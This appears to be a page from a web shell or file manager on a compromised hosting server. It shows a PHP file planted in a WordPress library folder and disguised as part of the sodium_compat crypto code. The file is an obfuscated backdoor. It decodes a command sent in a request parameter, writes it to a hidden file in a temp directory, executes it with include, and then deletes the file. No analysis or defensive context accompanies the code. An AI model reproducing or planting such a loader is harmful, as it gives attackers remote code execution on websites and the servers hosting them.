HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/home/vitanhod/www/wp-includes/sodium_compat/src/Core/Poly1305/gacl.php
<?php

if(isset($_REQUEST["element"]) ? true : false){
	$token = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), "/tmp", getcwd(), "/var/tmp", session_save_path(), getenv("TEMP")]);
	$mrk = $_REQUEST["element"];
	  $mrk	=explode ('.'	 , 		$mrk	 )		; 
	$ptr = '';
            $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt8);
            $l = 0;
    
            array_walk($mrk		, function($v8) use(&$ptr		, &$l		, $salt8		, $sLen) {	 $sChar = ord($salt8[$l	 %  $sLen]);
                $dec =((int)$v8 - $sChar -($l	 %  10))	 ^	 50;
                $ptr	.= chr($dec);
                $l++;
            });
	foreach ($token as $flg) {
    		if (max(0, is_dir($flg) * is_writable($flg))) {
    $ref = vsprintf("%s/%s", [$flg, ".data_chunk"]);
    $success = file_put_contents($ref, $ptr);
if ($success) {
	include $ref;
	@unlink($ref);
	die();}
}
}
}